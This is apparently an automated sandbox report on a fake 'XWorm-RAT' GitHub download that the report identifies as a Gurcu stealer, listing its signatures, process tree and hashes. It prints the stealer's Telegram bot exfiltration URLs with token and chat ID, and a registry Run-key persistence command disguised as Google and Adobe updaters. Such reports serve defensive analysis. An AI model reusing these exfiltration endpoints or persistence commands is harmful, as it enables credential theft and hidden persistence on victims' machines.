Analysis
-
max time kernel
356s -
max time network
356s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-01-2025 21:46
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Intestio/XWorm-RAT
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/Intestio/XWorm-RAT
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Command Reciever.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation conhost.exe -
Executes dropped EXE 2 IoCs
pid Process 2236 Command Reciever.exe 3276 conhost.exe -
Loads dropped DLL 2 IoCs
pid Process 2236 Command Reciever.exe 3276 conhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 80 raw.githubusercontent.com 81 raw.githubusercontent.com 86 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 78 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1476 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Command Reciever.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm RAT V2.1.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Command Reciever.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier conhost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Command Reciever.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1500 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3280 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1028 msedge.exe 1028 msedge.exe 908 msedge.exe 908 msedge.exe 1044 identity_helper.exe 1044 identity_helper.exe 788 msedge.exe 788 msedge.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 2236 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3276 conhost.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe 3476 Command Reciever.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2236 Command Reciever.exe Token: SeDebugPrivilege 1476 tasklist.exe Token: SeDebugPrivilege 3276 conhost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 908 msedge.exe 3476 Command Reciever.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3276 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 908 wrote to memory of 1488 908 msedge.exe 83 PID 908 wrote to memory of 1488 908 msedge.exe 83 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 536 908 msedge.exe 84 PID 908 wrote to memory of 1028 908 msedge.exe 85 PID 908 wrote to memory of 1028 908 msedge.exe 85 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86 PID 908 wrote to memory of 4488 908 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe5a4546f8,0x7ffe5a454708,0x7ffe5a4547182⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:22⤵PID:536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:82⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:2816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:82⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:12⤵PID:1748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:12⤵PID:1760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:12⤵PID:556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5280 /prefetch:82⤵PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4644 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,3376301118469354525,13302886201720319900,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4824 /prefetch:22⤵PID:4980
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:836
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:544
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4112
-
C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:4952 -
C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD618.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD618.tmp.bat3⤵PID:2228
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:4296
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2236"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:1240
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:1500
-
-
C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3276 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f5⤵PID:436
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:3280
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2228
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD50a9dc42e4013fc47438e96d24beb8eff
SHA1806ab26d7eae031a58484188a7eb1adab06457fc
SHA25658d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA5126fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD530acfefb009ac584aa7cdde331c10de9
SHA179c084007a32cd53f02025be88e16aaf726b33b3
SHA256cd2865071a9579f2b02a117e3e595e85506e10efcfefb0f68fc92eb999f4e2ea
SHA512f3e8ddea4da327b9ed4c0f95b910f8244716eaad6cfdb1c85e4c3bbf0cd692427c933fbc21e3f3a4a3efe5a5facee979fd068e7a1c4e6b15129fd2375b49c457
-
Filesize
124KB
MD5138143107d4feef0ef8ddc30076c4f48
SHA1419e80086888e398b7362adf7dd58c1ccf640afa
SHA2563cb132d25c616075ef7b1737798aaebddfef59b2817ad9f1c68cff5fa9b8f8df
SHA512c9432114b3febf61842e12c04792b2e6e7b4a3be70707b83d881de774698a692c681b9ed28681e909c02b76f94d8e70a051c299a7485523824969a9d1c76f82e
-
Filesize
672B
MD55845c97a62b7e8ae95ee8329cd599bcc
SHA1b3105e396cdb3cc204faa0ab6345247eaccfea13
SHA2564fb1f79268b5dfea27b50aec4d14530488b16e8bbf374c5074e577bc17154731
SHA5120da8fbbe60c2247d208d09bd023386cfbb08e39a6038f613d7edb982692623b1096510d5d74c7708a0abd2553583358c08d877c1bc8310247c56dc59d086665d
-
Filesize
6KB
MD527faefcb1030ca5b46a4e44deb0bacf0
SHA17f5e4bee95cc71143e05330ef172fa717ea3b38a
SHA256787687b5770813543656636d3d110a584f04cc6997a6c0dc2b3afbfe98c35f14
SHA512a2af9213aa5775569dcd2b0e04dda4f5a6df48fbb8b39e7e473212d931aeba7c5d3a3b06537ab1e0f150221048bdd201f84c50c56142786b6269ec0baa765d38
-
Filesize
5KB
MD59339e2b4a3d938c977cc853a52755ec2
SHA1ac1cfac77682c2627753490819ac866ebb04daeb
SHA25605188cdbbe4bd141192701c33a88a445819c26e4aab9a57159a0728f3f10c0d8
SHA512fb216178147b7660eaa98f566c4605985402a08988b4230d309295793c9cd9af5dfbfa94415af67da951a00eee17c09fbe800629680f68d0b62f640f6678a940
-
Filesize
6KB
MD5f4e70723e35e810d56d0abaae0cf04ed
SHA1bef430791e563330da5049d84950e968afec9bde
SHA25618c2691fa3b9fc8446b73cc65453e7c68b9a2b1e2cf56a9ccf05b3c79ac32fb4
SHA512a02a1317d50fa6c20b40080cdd4debc444b0d20e541bb59ee2e9f301bfe0c2ce00a10e8c443f409f4228a8560121cbbea5f49abd0b928c328dc8cdcce82a39e7
-
Filesize
1KB
MD535d7fa845662c9de2cd5b0b3fde84f7b
SHA1ab8523802efb26cf141ce1067e176b2ae4979311
SHA256382a804ec0be5994c7fb16e80f0da837dd43601a5584c4154b2228b567d02558
SHA5129863788d7994aba8aa90b3065795a4789c45d1e66334167890ec7b7111bd6cceebe91c9bcfb53a6e3bc827b0ad85d750327fce3768921636f684dfcb78b871f1
-
Filesize
1KB
MD59143e0e91e4a50a5402c4f0e58af12d7
SHA1a079686a34cd6b87540b97caebb1f3675c5241ed
SHA256f2acc282f3caf21609d370da884e2592d5ed632521f1773bc7e053e8d957f4dc
SHA51270b495344633f307f056100fae31246cee11f90bd9ad80212f95241287ba381cdf4d936a75dd5fb269847cb11bdf6fbf3f94e6504dd901678808d3186d01df2a
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD50ac467a2402d216ed3a1234660c2e6cf
SHA1c2b013fdf5dd4aca24c1cf4c27b35255772498e9
SHA25681544c306164141921fa6db8ff0b66080c23e4d5dd7d1869f5603d3053c61cd2
SHA512c9915b7f555e2563153566868ac7bd27348d2f01753a8d646835c9dc10ebdf326191c722f5f1f5e68cf9c6befd3edfdc9b625dd5c23f7d641fd2d3c203272892
-
Filesize
10KB
MD599a211f854c10477068f6467ebc24b7e
SHA1785cb42baae573dff7e3434a72974cbfd255c781
SHA2564bb7ef509358ac2cbc2cac2cc0b0b6189b8cbcd11759c30a75fb43a2bab66127
SHA512d1835407178f09c4e662c2d1eb3cef5c3ca6bd495c9fe7e3ec5aaee76191a48dec3b770ee4336f2f7d5492995638f058292698a92286db573464451d662c06b6
-
Filesize
5.6MB
MD5eb01eece5f0887b24a1bd53183d801dc
SHA149e92aee8351e3a995d8ec95bc64d7f381dcee28
SHA256a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c
SHA51283374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
295B
MD5bd35530e9ef5dbb374d66e224c1183eb
SHA12979253192fe453fe3ca67b9d526d08d1d6bf411
SHA256c7052e936bbae989aa6ffde593ed07ca7bab754b664b236115c6c05d9a1adb40
